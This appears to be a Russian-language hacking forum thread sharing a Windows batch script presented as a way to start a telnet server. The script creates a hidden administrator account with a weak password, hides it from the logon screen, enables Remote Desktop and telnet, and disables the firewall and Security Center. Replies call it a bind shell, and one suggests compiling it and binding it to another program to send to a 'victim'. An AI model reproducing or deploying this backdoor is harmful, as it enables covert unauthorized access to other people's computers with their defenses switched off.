Вобсчем столнулся с такой проблемой пару дней назад негде немог и найти ее решения.
Задачай было поднять telnet какимто скриптом!
В итоге решение задачи:
Создаем .bat файл с таким содержанем и запускаем на сервере, в итоге мы получаем поднятый telnet сервак

Chcp 1251
net user Админ 1234 /add > nul
net localgroup Администраторы Админ /add > nul
net localgroup "Пользователи удаленного рабочего стола" Админ /add > nul
cd %systemroot%
@echo Windows Registry Editor Version 5.00 > tmp.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t] >> tmp.reg
@echo "Админ"=dword:00000000 >> tmp.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Lsa] >> tmp.reg
@echo "forceguest"=dword:00000000 >> tmp.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server] >> tmp.reg
@echo "fAllowToGetHelp"=dword:00000000 >> tmp.reg
@echo "fDenyTSConnections"=dword:00000000 >> tmp.reg
regedit /s %SystemRoot%\tmp.reg /y
sc stop wscsvc > nul
sc stop SharedAccess > nul
sc config wscsvc start= disabled > nul
sc config SharedAccess start= disabled > nul
sc config tlntsvr start= auto > nul
sc config termservice start= auto > nul
sc start tlntsvr > nul
sc start termservice > nul
cd %systemroot%
del tmp.reg

Типа бинд-шелл на 23 порту?..

ага

Как вариант: можно закомпилить его Quick Batch File Compiler'ом и склеить с какой-нить прогой. Потом кинуть получившийся файл жертве.
Скачать можно отсюда - http://soft.mydiv.net/win/download-Quick-Batch-File-Compiler.html

IMHO, по умолчанию telnet служба отключен. И в батнике сначало надо записывать:
net start telnet

IMHO, по умолчанию telnet служба отключен. И в батнике сначало надо записывать:
net start telnet


Ненужно, так как вопервих система непозволит нам стартовать этот сервис, вовторых мы и так включаем службу через реестр